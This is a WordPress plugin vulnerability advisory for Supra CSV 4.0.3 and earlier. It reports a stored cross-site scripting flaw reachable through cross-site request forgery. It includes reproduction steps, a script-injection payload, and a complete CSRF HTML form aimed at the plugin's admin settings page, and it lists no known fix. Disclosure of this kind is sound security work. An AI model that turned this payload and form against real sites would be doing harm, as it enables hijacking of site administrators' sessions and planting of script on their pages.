WordPress Plugin Vulnerabilities

Supra CSV <= 4.0.3 - Stored Cross-Site Scripting via CSRF

Description

Cross-site Scripting (XSS) is a client-side code injection attack. The attacker aims to execute malicious scripts in a web browser of the victim by including malicious code in a legitimate web page or web application.
I have found a Stored XSS on the plugin Supra CSV Version: 4.0.3. Here is the official page of the plugin given below
https://wordpress.org/plugins/supra-csv-parser

Proof of Concept

Step to reproduce:
Step1: Download and install the plugin
Step2:Activate and go to the setting of the plugin.
Step3:Give the details and intercept the request using burp suite.
Step4:The parameter "scsv_defaultdesc="is vulnerable to XSS with the below payload
“ xss</textarea></p><script>alert(1)</script>// ”
Step5:From this script we can see the plugin is vulnerable to stored XSS.
Step6:Generate CSRF payload for the request and send it to the victim.
Step7: CSRF payload is given below
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1/wordpress/wp-admin/admin.php?page=supra_csv_admin" method="POST">
      <input type="hidden" name="scsv_wpname" value="xss1<>"&apos;/" />
      <input type="hidden" name="scsv_wppass" value="xss2<>"&apos;/" />
      <input type="hidden" name="scsv_autopub" value="0" />
      <input type="hidden" name="scsv_posttype" value="post" />
      <input type="hidden" name="scsv_defaulttitle" value="xss3<>"&apos;/" />
      <input type="hidden" name="scsv_defaultdesc" value="xss4</textarea></p><script>alert(2)</script>//" />
      <input type="hidden" name="scsv_custom_terms" value="xss5<>"&apos;/" />
      <input type="hidden" name="scsv_csv_settings[delimiter]" value=",xss6<>"&apos;/" />
      <input type="hidden" name="scsv_csv_settings[enclosure]" value=""xss7<>"&apos;/" />
      <input type="hidden" name="scsv_csv_settings[escape]" value="\" />
      <input type="hidden" name="scsv_line_maxlen" value="1000" />
      <input type="hidden" name="scsv_submit" value="Update Options" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Step8: Stored XSS is successfully executed with CSRF vulnerability.

Affects Plugins

No known fix

References

Classification

Type
XSS
CWE

Miscellaneous

Original Researcher
Rahul selvakumar
Submitter
Rahul selvakumar
Verified
Yes

Timeline

Publicly Published
2022-12-05 (about 1 years ago)
Added
2022-11-21 (about 1 years ago)
Last Updated
2022-11-21 (about 1 years ago)

Other